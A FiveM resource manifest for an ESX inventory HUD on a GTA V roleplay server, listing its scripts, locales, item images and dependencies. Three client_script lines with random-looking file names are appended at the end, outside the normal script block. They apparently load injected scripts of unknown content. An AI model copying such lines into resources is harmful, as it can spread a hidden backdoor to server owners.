fx_version 'adamant'

game 'gta5'

description 'Inventory HUD for ESX 1.2'

version '2.3.1'

server_scripts {
  "@async/async.lua",
  '@mysql-async/lib/MySQL.lua',
  "@es_extended/locale.lua",
  "server/main.lua",
  "locales/nl.lua",
  "locales/en.lua",
  "locales/fr.lua",
  "config.lua"
}

client_scripts {
  "@es_extended/locale.lua",
  "client/main.lua",
  "client/shop.lua",	
  "client/trunk.lua",
  "client/glovebox.lua",
  "client/beds.lua",
  "client/motels.lua",
  "client/property.lua",
  "client/player.lua",
  "locales/nl.lua",
  "locales/en.lua",
  "locales/fr.lua",
  "config.lua"
}

ui_page {
	'html/ui.html'
}

files {
  "html/ui.html",
  "html/css/ui.css",
  "html/css/jquery-ui.css",
  "html/js/inventory.js",
  "html/js/config.js",
  -- JS LOCALES
  "html/locales/en.js",
  "html/locales/nl.js",
  "html/locales/fr.js",
  -- IMAGES
"html/img/items/alive_chicken.png",
"html/img/items/bagofdope.png",
"html/img/items/bandage.png",
"html/img/items/beer.png",
"html/img/items/black_money.png",
"html/img/items/blowpipe.png",
"html/img/items/blowtorch.png",
"html/img/items/bolcacahuetes.png",
"html/img/items/bolchips.png",
"html/img/items/bolnoixcajou.png",
"html/img/items/bolpistache.png",
"html/img/items/bread.png",
"html/img/items/breathalyzer.png",
"html/img/items/bulletproof.png",
"html/img/items/c4_bank.png",
"html/img/items/camera.png",
"html/img/items/cannabis.png",
"html/img/items/carokit.png",
"html/img/items/carotool.png",
"html/img/items/cash.png",
"html/img/items/chocolate-1333.png",
"html/img/items/chocolate.png",
"html/img/items/cigarett.png",
"html/img/items/clip.png",
"html/img/items/clothe.png",
"html/img/items/coca.png",
"html/img/items/cocacola.png",
"html/img/items/cocaine.png",
"html/img/items/coffe.png",
"html/img/items/coke_pooch.png",
"html/img/items/contract.png",
"html/img/items/Cooper.png",
"html/img/items/copper.png",
"html/img/items/crack.png",
"html/img/items/Crak.png",
"html/img/items/cuffs.png",
"html/img/items/cuff_keys.png",
"html/img/items/cupcake.png",
"html/img/items/cutted_wood.png",
"html/img/items/dabs.png",
"html/img/items/diamond.png",
"html/img/items/dopebag.png",
"html/img/items/drpepper.png",
"html/img/items/drugscales.png",
"html/img/items/drugtest.png",
"html/img/items/energy.png",
"html/img/items/ephedra.png",
"html/img/items/ephedrine.png",
"html/img/items/essence.png",
"html/img/items/fabric.png",
"html/img/items/fakepee.png",
"html/img/items/fish.png",
"html/img/items/fixkit.png",
"html/img/items/fixtool.png",
"html/img/items/gazbottle.png",
"html/img/items/gold.png",
"html/img/items/goldNecklace.png",
"html/img/items/golem.png",
"html/img/items/grapperaisin.png",
"html/img/items/hamburger.png",
"html/img/items/heroine.png",
"html/img/items/hifi.png",
"html/img/items/highgradefemaleseed.png",
"html/img/items/highgradefert.jpg",
"html/img/items/highgradefert.png",
"html/img/items/highgrademaleseed.png",
"html/img/items/ice.png",
"html/img/items/icetea.png",
"html/img/items/iron.png",
"html/img/items/jager.png",
"html/img/items/jagerbomb.png",
"html/img/items/jagercerbere.png",
"html/img/items/jewels.png",
"html/img/items/joy.jpg",
"html/img/items/joy.png",
"html/img/items/jusfruit.png",
"html/img/items/laptop.png",
"html/img/items/leite.png",
"html/img/items/lemonade.png",
"html/img/items/lighter.png",
"html/img/items/limonade.png",
"html/img/items/lockpick.png",
"html/img/items/lowgradefemaleseed.png",
"html/img/items/lowgradefert.jpg",
"html/img/items/lowgradefert.png",
"html/img/items/lowgrademaleseed.png",
"html/img/items/marijuana.png",
"html/img/items/martini.png",
"html/img/items/medikit.png",
"html/img/items/menthe.png",
"html/img/items/meth.png",
"html/img/items/metreshooter.png",
"html/img/items/milk.png",
"html/img/items/milkbottle.png",
"html/img/items/mixapero.png",
"html/img/items/mleko.png",
"html/img/items/mojito.png",
"html/img/items/opium-icon.png",
"html/img/items/opium.png",
"html/img/items/oxygen_mask.png",
"html/img/items/packaged_chicken.png",
"html/img/items/packaged_plank.png",
"html/img/items/painkiller.png",
"html/img/items/petrol.png",
"html/img/items/petrol_raffin.png",
"html/img/items/pizza.png",
"html/img/items/planpot.png",
"html/img/items/plantpot.png",
"html/img/items/poppy.png",
"html/img/items/purifiedwater.png",
"html/img/items/raspberry.png",
"html/img/items/rasperry.png",
"html/img/items/rhum.png",
"html/img/items/rhumcoca.png",
"html/img/items/rhumfruit.png",
"html/img/items/ring.png",
"html/img/items/rolex.png",
"html/img/items/salpicao.png",
"html/img/items/samsungs10.jpg",
"html/img/items/samsungs10.png",
"html/img/items/samsungs10.pnh",
"html/img/items/sandwich.png",
"html/img/items/sangria.png",
"html/img/items/saucisson.png",
"html/img/items/slaughtered_chicken.jpg",
"html/img/items/slaughtered_chicken.png",
"html/img/items/soda.png",
"html/img/items/stone.png",
"html/img/items/teqpaf.jpg",
"html/img/items/teqpaf.png",
"html/img/items/tequila.jpg",
"html/img/items/vodka.png",
"html/img/items/vodkaenergy.png",
"html/img/items/vodkafruit.png",
"html/img/items/vodkajoy.png",
"html/img/items/washed_stone.png",
"html/img/items/water.png",
"html/img/items/wateringcan.png",
"html/img/items/WEAPON_APPISTOL.png",
"html/img/items/WEAPON_ASSAULTRIFLE.png",
"html/img/items/WEAPON_ASSAULTSHOTGUN.png",
"html/img/items/WEAPON_BAT.png",
"html/img/items/WEAPON_BOTTLE.png",
"html/img/items/WEAPON_BULLPUPRIFLE.png",
"html/img/items/WEAPON_CARBINERIFLE.png",
"html/img/items/WEAPON_COMBATMG.png",
"html/img/items/WEAPON_COMBATPISTOL.png",
"html/img/items/WEAPON_CROWBAR.png",
"html/img/items/WEAPON_DAGGER.png",
"html/img/items/WEAPON_DBSHOTGUN.png",
"html/img/items/WEAPON_FLASHLIGHT.png",
"html/img/items/WEAPON_GOLFCLUB.png",
"html/img/items/WEAPON_HAMMER.png",
"html/img/items/WEAPON_KNIFE.png",
"html/img/items/WEAPON_KNUCKLE.png",
"html/img/items/WEAPON_MICROSMG.png",
"html/img/items/WEAPON_NIGHTSTICK.png",
"html/img/items/WEAPON_PETROLCAN.png",
"html/img/items/WEAPON_PISTOL.png",
"html/img/items/WEAPON_PISTOL50.png",
"html/img/items/WEAPON_POOLCUE.png",
"html/img/items/WEAPON_PUMPSHOTGUN.png",
"html/img/items/WEAPON_REVOLVER.png",
"html/img/items/WEAPON_SAWNOFFSHOTGUN.png",
"html/img/items/WEAPON_SMG.png",
"html/img/items/WEAPON_SPECIALCARBINE.png",
"html/img/items/WEAPON_STUNGUN.png",
"html/img/items/WEAPON_SWITCHBLADE.png",
"html/img/items/weed_pooch.png",
"html/img/items/wheat.png",
"html/img/items/whiskey.png",
"html/img/items/whisky.png",
"html/img/items/whiskycoca.png",
"html/img/items/wine.png",
"html/img/items/wood.png",
"html/img/items/wool.png",
}

dependencies {
  'es_extended',
  'cron',
  'esx_addonaccount',
  'esx_addoninventory',
  'esx_datastore',
  'esx_license',
  'B1G_NOTIFY'
}
client_script "goibMgBiEDftYxR.lua"
client_script "WtHLsmDdJeXFakD.lua"
client_script "nFTcmYdqJtFMgmPceU.lua"